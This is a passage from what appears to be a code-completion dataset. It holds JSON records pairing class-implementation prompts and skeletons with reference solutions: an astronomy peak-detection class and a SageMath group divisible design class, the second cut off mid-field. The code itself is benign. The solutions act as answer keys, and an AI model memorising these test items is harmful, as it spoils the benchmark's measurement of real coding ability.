"star_events_count": 3077} {"blob_id": "d1fb5f84538822f6219b18608e3ece32372eef08", "bodies": ["super().__init__(max_n_sources)\nself.min_distance = min_distance\nself.threshold_scale = threshold_scale\nif use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\nif use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\nself.use_mean = use_mean\nself.use_band = use_band", "blend_image = blend_batch.blend_images[ii]\nif self.use_mean:\n image = np.mean(blend_image, axis=0)\nelse:\n image = blend_image[self.use_band]\nthreshold = self.threshold_scale * np.std(image)\ncoordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\nx, y = (coordinates[:, 1], coordinates[:, 0])\nwcs = blend_batch.wcs\nra, dec = wcs.pixel_to_world_values(x, y)\nra *= 3600\ndec *= 3600\ncatalog = Table()\ncatalog['ra'], catalog['dec'] = (ra, dec)\nreturn DeblendExample(self.max_n_sources, catalog)"], "bodies_text": "<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "class_docstring": "This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.", "class_name": "PeakLocalMax", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000052", "length_bytes": 24907, "license_type": "permissive", "methods": [{"docstring": "Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.", "name": "__init__", "signature": "def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None"}, {"docstring": "Performs measurement on the ii-th example from the batch.", "name": "deblend", "signature": "def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002981", "prompt": "Implement the Python class `PeakLocalMax` described below.\n\nClass description:\nThis class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\n\nMethod signatures and docstrings:\n- def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None: Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\n- def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample: Performs measurement on the ii-th example from the batch.", "prompted_full_text": "Implement the Python class `PeakLocalMax` described below.\n\nClass description:\nThis class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\n\nMethod signatures and docstrings:\n- def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None: Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\n- def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample: Performs measurement on the ii-th example from the batch.\n\n<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n<|end_body_0|>\n\n<|body_start_1|>\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n<|end_body_1|>\n", "revision_id": "f5b716a373f130238100db8980aa0d282822983a", "skeleton": "<|skeleton|>\nclass PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n <|body_0|>\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PeakLocalMax:\n \"\"\"This class detects centroids with `skimage.feature.peak_local_max`. The function performs detection and deblending of the sources based on the provided band index. If use_mean feature is used, then the measurement function is using the average of all the bands.\"\"\"\n\n def __init__(self, max_n_sources: int, threshold_scale: int=5, min_distance: int=2, use_mean: bool=False, use_band: Optional[int]=None) -> None:\n \"\"\"Initializes measurement class. Exactly one of 'use_mean' or 'use_band' must be specified. Args: max_n_sources: See parent class. threshold_scale: Minimum intensity of peaks. min_distance: Minimum distance in pixels between two peaks. use_mean: Flag to use the band average for the measurement. use_band: Integer index of the band to use for the measurement.\"\"\"\n super().__init__(max_n_sources)\n self.min_distance = min_distance\n self.threshold_scale = threshold_scale\n if use_band is None and (not use_mean):\n raise ValueError(\"Either set 'use_mean=True' OR indicate a 'use_band' index\")\n if use_band is not None and use_mean:\n raise ValueError(\"Only one of the parameters 'use_band' and 'use_mean' has to be set\")\n self.use_mean = use_mean\n self.use_band = use_band\n\n def deblend(self, ii: int, blend_batch: BlendBatch) -> DeblendExample:\n \"\"\"Performs measurement on the ii-th example from the batch.\"\"\"\n blend_image = blend_batch.blend_images[ii]\n if self.use_mean:\n image = np.mean(blend_image, axis=0)\n else:\n image = blend_image[self.use_band]\n threshold = self.threshold_scale * np.std(image)\n coordinates = peak_local_max(image, min_distance=self.min_distance, threshold_abs=threshold)\n x, y = (coordinates[:, 1], coordinates[:, 0])\n wcs = blend_batch.wcs\n ra, dec = wcs.pixel_to_world_values(x, y)\n ra *= 3600\n dec *= 3600\n catalog = Table()\n catalog['ra'], catalog['dec'] = (ra, dec)\n return DeblendExample(self.max_n_sources, catalog)\n", "source": "the_stack_v2_python_sparse", "source_path": "btk/deblend.py", "source_repo": "LSSTDESC/BlendingToolKit", "split": "test", "star_events_count": 22} {"blob_id": "1d302630b056840b480fda2d2084d23aac60171e", "bodies": ["from .designs_pyx import is_group_divisible_design\nself._lambd = lambd\nIncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\nif groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\nelif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\nelse:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\nif check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]", "if self._point_to_index is None:\n return [list(g) for g in self._groups]\nelse:\n return [[self._points[i] for i in g] for g in self._groups]", "group_sizes = [len(_) for _ in self._groups]\ngdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\ngdd_type = '.'.join(gdd_type)\nif not gdd_type:\n gdd_type = '1^0'\nv = self.num_points()\nreturn 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)"], "bodies_text": "<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "class_docstring": "Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to", "class_name": "GroupDivisibleDesign", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000053", "length_bytes": 13086, "license_type": "no_license", "methods": [{"docstring": "Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "name": "__init__", "signature": "def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds)"}, {"docstring": "Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [", "name": "groups", "signature": "def groups(self)"}, {"docstring": "Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "name": "__repr__", "signature": "def __repr__(self)"}], "n_methods": 3, "prompt": "Implement the Python class `GroupDivisibleDesign` described below.\n\nClass description:\nGroup Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\n\nMethod signatures and docstrings:\n- def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds): Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n- def groups(self): Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\n- def __repr__(self): Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4", "prompted_full_text": "Implement the Python class `GroupDivisibleDesign` described below.\n\nClass description:\nGroup Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\n\nMethod signatures and docstrings:\n- def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds): Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n- def groups(self): Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\n- def __repr__(self): Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\n\n<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n<|end_body_0|>\n\n<|body_start_1|>\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n<|end_body_1|>\n\n<|body_start_2|>\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n<|end_body_2|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_0|>\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GroupDivisibleDesign:\n \"\"\"Group Divisible Design (GDD) Let `K` and `G` be sets of positive integers and let `\\\\lambda` be a positive integer. A Group Divisible Design of index `\\\\lambda` and 